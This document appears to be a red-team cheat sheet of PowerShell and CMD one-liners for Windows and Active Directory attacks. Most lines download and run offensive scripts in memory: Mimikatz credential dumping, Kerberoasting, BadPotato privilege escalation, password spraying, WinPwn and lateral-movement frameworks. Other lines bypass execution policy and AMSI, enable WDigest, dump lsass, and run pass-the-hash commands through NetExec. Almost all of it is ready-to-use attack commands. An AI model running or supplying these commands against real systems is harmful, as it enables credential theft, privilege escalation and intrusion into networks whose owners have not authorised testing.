Intern Pentesting notes
| [+] Collection of PowerShell and CMD one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # ======================================== | |
| # POWERSHELL LOADERS (Run from CMD) | |
| # ======================================== | |
| #Invoke-BypassUAC and start a PowerShell prompt as Administrator [or replace the command to run anything else] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| #Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| #Import Mimikatz Module to run further commands | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" | |
| #PowerUp: Privilege escalation checks | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks" | |
| #Invoke-Inveigh and log output to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y" | |
| #Invoke-Kerberoast and provide Hashcat compatible hashes | |
| powershell.exe -exec Bypass -C "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt" | |
| #Invoke-ShareFinder and print output to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| #Import PowerView Module to run further commands | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
| #Invoke-BloodHound with the DCOnly collection method, chosen for speed | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/puckiestyle/powershell/master/SharpHound.ps1');Invoke-BloodHound -CollectionMethod DCOnly" | |
| #WinPEAS - Download latest release and execute from memory, output to file | |
| powershell.exe -exec Bypass -C "$url='https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe';$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest $url -UseBasicParsing | Select-Object -ExpandProperty Content));[winPEAS.Program]::Main('nocolor log=winpeas.txt')" | |
| #WinPEAS - Download latest release and execute from memory with custom parameters | |
| powershell.exe -exec Bypass -C "$url='https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe';$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest $url -UseBasicParsing | Select-Object -ExpandProperty Content));[winPEAS.Program]::Main('other-flags-first log=output.txt')" | |
| #WinPEAS - Download to disk and execute (noisy) | |
| powershell.exe -exec Bypass -C "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe','winPEASany_ofs.exe');.\winPEASany_ofs.exe log=winpeas.txt" | |
| # ======================================== | |
| # POWERSHELL LOADERS (Run from PowerShell) | |
| # ======================================== | |
| #Windows-Security-Checks | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/Windows-Security-Checks/refs/heads/main/check.ps1') | |
| #Registry and Startup Enumeration Script | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/Windows-Security-Checks/refs/heads/main/Registry-Startup-Check.ps1') | |
| #PowerView Example - Export domain user emails | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1'); Get-DomainUser | Select-Object samaccountname, emailaddress | Export-Csv -Path "H:\Desktop\UserEmails.csv" -NoTypeInformation | |
| #Run Rubeus and run triage command | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1'); Invoke-Rubeus triage | |
| #BadPotato exploit; requires impersonation privileges | |
| iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/IAMinZoho/OFFSEC-PowerShell/main/Invoke-BadPotato.ps1')); Invoke-BadPotato | |
| #Watson (rastamouse's next-gen exploit suggester) | |
| iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/IAMinZoho/OFFSEC-PowerShell/main/Invoke-SharpWatson.ps1')); Invoke-watson | |
| #Domain password spraying | |
| iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/DomainPasswordSpray/master/DomainPasswordSpray.ps1')); Invoke-DomainPasswordSpray -Password Zomer2023! | |
| # or | |
| IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/DomainPasswordSpray/master/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -Password Zomer2023! | |
| #WinPwn - collection of Windows exploitation tools | |
| iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1'); winpwn | |
| #ADCSPwn | |
| iex(new-object net.webclient).downloadstring('needs new powsh loader!'); Invoke-ADCSPwn | |
| #Amnesiac - post-exploitation framework for lateral movement within AD environments | |
| iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');Amnesiac | |
| #WinPEAS - Download latest release and execute from memory, output to file | |
| $url='https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe';$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest $url -UseBasicParsing | Select-Object -ExpandProperty Content));[winPEAS.Program]::Main('nocolor log=winpeas.txt') | |
| #WinPEAS - Download latest release and execute from memory (with custom parameters) | |
| $url='https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe' | |
| $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest $url -UseBasicParsing | Select-Object -ExpandProperty Content)) | |
| [winPEAS.Program]::Main('other-flags-first log=output.txt') | |
| #WinPEAS - Download to disk and execute (noisy) | |
| $wc=New-Object System.Net.WebClient | |
| $wc.DownloadFile('https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe','winPEASany_ofs.exe') | |
| .\winPEASany_ofs.exe nocolor log=winpeas.txt | |
| # ======================================== | |
| # CMD COMMANDS | |
| # ======================================== | |
| #Find GPP Passwords in SYSVOL (CMD version) | |
| findstr /S cpassword %logonserver%\sysvol\*.xml | |
| #Run Powershell prompt as a different user, without loading profile [replace DOMAIN and USER] | |
| runas /user:DOMAIN\USER /noprofile powershell.exe | |
| #Insert reg key to enable Wdigest on newer versions of Windows | |
| reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1 | |
| #Enable RDP | |
| reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f | |
| #Disable RDP | |
| reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f | |
| #Disable Restricted Admin Mode for RDP | |
| reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f | |
| #Enable Restricted Admin Mode for RDP | |
| reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 1 /f | |
| #Disable Restricted Admin Mode for RDP via NetExec | |
| nxc smb <machine> -u <user> -H <hash> -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f' | |
| #Enable Restricted Admin Mode for RDP via NetExec | |
| nxc smb <machine> -u <user> -H <hash> -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x1 /f' | |
| #Manual Procdump for offline mimikatz | |
| .\procdump.exe -accepteula -ma lsass.exe lsass.dmp | |
| #Check always install elevated | |
| reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer | |
| reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer | |
| #Check user privileges | |
| net user /domain ticketsamname | |
| # ======================================== | |
| # POWERSHELL COMMANDS (Direct) | |
| # ======================================== | |
| #Find GPP Passwords in SYSVOL (PowerShell version) | |
| findstr /S cpassword $env:logonserver\sysvol\*.xml | |
| # ======================================== | |
| # NOTES | |
| # ======================================== | |
| # If PowerShell is restricted by the execution policy, or there are SSL/TLS issues, add: | |
| Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex etc etc | |
| #NimPlant example PowerShell usage | |
| powershell BYPASSAMSI=0 BLOCKETW=0 "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/Windows-Security-Checks/refs/heads/main/Registry-Startup-Check.ps1')" | |
| #It will fuck the output with emojis, ANSI or other bullshit; looks hacky but works | |
| powershell BYPASSAMSI=0 BLOCKETW=0 "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/Windows-Security-Checks/refs/heads/main/Registry-Startup-Check.ps1')| Out-File -FilePath ".\Registry-Startup-Check-Results.txt"" | |
| # | |
| powershell BYPASSAMSI=1 BLOCKETW=0 "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/moscowchill/Windows-Security-Checks/refs/heads/main/check.ps1')| Out-File -FilePath ".\check.txt"" |